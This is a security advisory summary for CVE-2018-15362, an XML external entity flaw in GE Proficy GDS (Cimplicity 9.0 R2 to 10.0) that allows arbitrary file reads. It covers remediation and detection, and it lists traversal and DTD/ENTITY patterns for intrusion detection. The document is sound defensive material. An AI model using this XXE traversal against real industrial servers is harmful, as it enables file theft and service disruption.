Full Report
An XXE injection vulnerability leads to path traversal inside the Proficy server. An attacker may be able to initiate an OPC UA session and retrieve an arbitrary file from the target system.
Analysis Summary
# Vulnerability: XML External Entity (XXE) in GE Proficy GDS
## CVE Details
- **CVE ID:** CVE-2018-15362
- **CVSS Score:** 8.2 (High)
- **CVSS Vector:** CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
- **CWE:** CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products:** General Electric Proficy GDS (Global Discovery Server) used within Cimplicity environments.
- **Versions:**
- Cimplicity 9.0 R2
- Cimplicity 9.5
- Cimplicity 10.0
- **Configurations:** Systems running the Global Discovery Server (GDS) that listen for OPC UA sessions.
## Vulnerability Description
An XML External Entity (XXE) injection vulnerability exists in the way the Proficy GDS processes XML input. The flaw occurs when the XML parser handles specially crafted XML data containing references to external entities. Due to improper path traversal handling within the server context, an attacker can leverage this flaw to access restricted directories and retrieve arbitrary files from the host file system.
## Exploitation
- **Status:** Unknown (No public PoC currently linked in the advisory, though the vulnerability is well-documented).
- **Complexity:** Low
- **Attack Vector:** Network (Remote)
## Impact
- **Confidentiality:** Low/Partial (Ability to read arbitrary files from the target system).
- **Integrity:** None
- **Availability:** High (The CVSS vector indicates a high impact on availability, potentially leading to service disruption or server crashes).
## Remediation
### Patches
- GE recommends updating Proficy GDS to **Version 2.1** or newer.
- The patch can be accessed via the GE Digital support portal (Authentication required): hxxps://ge-ip[.]flexnetoperations[.]com/control/geip/download?element=10544807
### Workarounds
- No specific software workarounds were provided in the advisory. General XXE mitigation includes disabling DTDs (Document Type Definitions) or external entity expansion in XML parsers if the patch cannot be immediately applied.
- Restrict network access to the GDS OPC UA port to trusted hosts only.
## Detection
- **Indicators of Compromise:** Monitor for unusual OPC UA session requests or suspicious directory traversal patterns (e.g., `../` or `%2e%2e%2f`) within XML payloads sent to the GDS.
- **Detection methods and tools:** Use Intrusion Detection Systems (IDS) with signatures specifically tuned to detect XXE patterns (DOCTYPE/ENTITY tags) in network traffic directed at GE Proficy ports.
## References
- Kaspersky ICS CERT Advisory: hxxps://ics-cert[.]kaspersky[.]com/advisories/2018/12/07/klcert-18-025-general-electric-proficy-gds-xml-external-entity-xxe/
- NVD CVE-2018-15362: hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2018-15362